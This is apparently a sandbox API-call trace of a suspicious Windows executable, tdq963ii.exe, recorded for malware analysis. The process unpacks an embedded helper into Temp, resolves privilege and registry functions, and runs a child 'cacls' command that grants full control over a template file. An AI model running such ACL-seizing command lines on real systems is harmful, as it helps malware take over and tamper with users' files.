\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¥\x93Ë;äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0224.563] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x80) returned 0x8d9de0 [0224.563] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0224.563] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0224.564] RtlSizeHeap (HeapHandle=0x8c0000, Flags=0x0, MemoryPointer=0x8d9de0) returned 0x80 [0224.564] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0224.564] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0224.564] GetCurrentProcess () returned 0xffffffff [0224.564] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0224.564] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0224.564] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0224.564] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0224.564] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0224.564] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0224.564] LockResource (hResData=0x43c648) returned 0x43c648 [0224.565] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x18) returned 0x8d9e68 [0224.565] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0224.566] GetLastError () returned 0x20 [0224.566] GetLastError () returned 0x20 [0224.566] SetLastError (dwErrCode=0x20) [0224.566] GetLastError () returned 0x20 [0224.566] SetLastError (dwErrCode=0x20) [0224.566] GetLastError () returned 0x20 [0224.566] SetLastError (dwErrCode=0x20) [0224.566] GetLastError () returned 0x20 [0224.566] SetLastError (dwErrCode=0x20) [0224.567] GetLastError () returned 0x20 [0224.567] SetLastError (dwErrCode=0x20) [0224.567] GetLastError () returned 0x20 [0224.567] SetLastError (dwErrCode=0x20) [0224.567] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1000) returned 0x8d9e88 [0224.568] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0224.569] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8d93b0 | out: hHeap=0x8c0000) returned 1 [0224.569] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0224.569] ExitProcess (uExitCode=0x1) [0224.570] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8d60b0 | out: hHeap=0x8c0000) returned 1 Process: id = "232" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x2ac99000" os_pid = "0x320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "217" os_parent_pid = "0xad4" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 824 os_tid = 0xb1c Process: id = "233" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x292a3000" os_pid = "0xac4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "229" os_parent_pid = "0x570" cmd_line = "tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 828 os_tid = 0x130 [0228.378] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0228.378] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0228.378] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0228.378] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0228.378] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0228.378] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0228.379] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0228.379] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0228.379] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0228.379] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0228.379] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0228.379] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0228.379] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0228.379] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0228.380] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0228.381] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0228.381] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0228.381] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0228.381] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0228.381] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0228.381] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0228.381] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0228.381] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0228.382] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0228.383] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0228.383] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0228.383] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0228.383] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0228.383] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0228.383] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0228.383] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0228.383] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0228.384] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0228.384] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0228.384] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0228.384] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0228.384] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0228.384] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0228.384] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0228.384] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0228.385] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0228.385] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0228.385] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0228.385] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0228.385] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0228.385] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0228.385] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0228.385] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0228.386] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0228.386] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0228.386] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0228.386] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0228.386] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0228.386] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0228.386] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0228.386] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0228.387] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0228.387] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0228.387] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0228.387] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0228.387] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0228.387] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0228.387] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0228.387] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0228.388] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0228.388] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0228.388] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0228.388] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0228.388] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0228.388] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0228.388] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0228.388] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0228.389] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0228.389] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0228.389] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0228.389] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0228.389] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0228.389] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0228.389] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0228.389] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0228.390] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0228.390] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0228.390] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0228.390] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0228.390] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0228.390] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0228.390] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0228.390] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0228.391] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0228.392] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0228.392] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0228.392] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0228.392] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0228.392] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0228.392] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0228.392] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0228.392] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0228.392] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0228.393] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0228.393] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0228.393] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0228.393] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0228.393] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0228.393] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0228.393] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0228.394] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0228.394] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0228.394] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0228.394] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0228.394] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0228.394] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0228.394] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0228.395] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0228.395] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0228.395] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0228.395] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0228.395] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0228.395] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0228.395] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0228.397] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0228.397] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x3f64a2a0, dwHighDateTime=0x1d68287)) [0228.397] GetCurrentThreadId () returned 0x130 [0228.397] GetCurrentProcessId () returned 0xac4 [0228.397] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=34873655220) returned 1 [0228.398] GetProcessHeap () returned 0x580000 [0228.398] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0228.399] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0228.400] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0228.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0228.401] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0228.401] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0228.401] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0228.401] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0228.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0228.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0228.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0228.402] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0228.402] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0228.402] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0228.402] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0228.402] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0228.402] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0228.402] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0228.403] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3bc) returned 0x5970b0 [0228.403] GetCurrentThreadId () returned 0x130 [0228.403] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x597478 [0228.403] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x800) returned 0x597498 [0228.403] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x201394d3, hStdError=0x0)) [0228.404] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0228.404] GetFileType (hFile=0x3) returned 0x2 [0228.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0228.510] GetFileType (hFile=0x80) returned 0x3 [0228.510] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0228.510] GetFileType (hFile=0xb) returned 0x2 [0228.511] GetCommandLineW () returned="tdq963ii.exe -accepteula \"Month_Calendar.jtp\" -nobanner" [0228.511] GetEnvironmentStringsW () returned 0x597ca0* [0228.511] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xb8c) returned 0x598838 [0228.511] FreeEnvironmentStringsW (penv=0x597ca0) returned 1 [0228.511] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x80) returned 0x597ca0 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xa0) returned 0x597d28 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3e) returned 0x594de0 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x6c) returned 0x597dd0 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x6e) returned 0x597e48 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x78) returned 0x58f910 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x62) returned 0x597ec0 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x597f30 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x48) returned 0x597f68 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x597fb8 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x28) returned 0x597ff0 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1a) returned 0x596a80 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x4a) returned 0x598020 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x72) returned 0x58f990 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x598078 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x5980b0 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1c) returned 0x596aa8 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xd2) returned 0x5980e8 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x7c) returned 0x5981c8 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x36) returned 0x598250 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3a) returned 0x594e28 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x90) returned 0x598290 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x598328 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x598358 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x36) returned 0x598390 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x48) returned 0x5983d0 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x52) returned 0x598420 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c) returned 0x594e70 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x18) returned 0x598480 [0228.512] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x82) returned 0x5984a0 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x598530 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1e) returned 0x596ad0 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2c) returned 0x598568 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x54) returned 0x5985a0 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x52) returned 0x598600 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2a) returned 0x598660 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c) returned 0x594eb8 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x54) returned 0x598698 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x5986f8 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x598728 [0228.513] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x8c) returned 0x598760 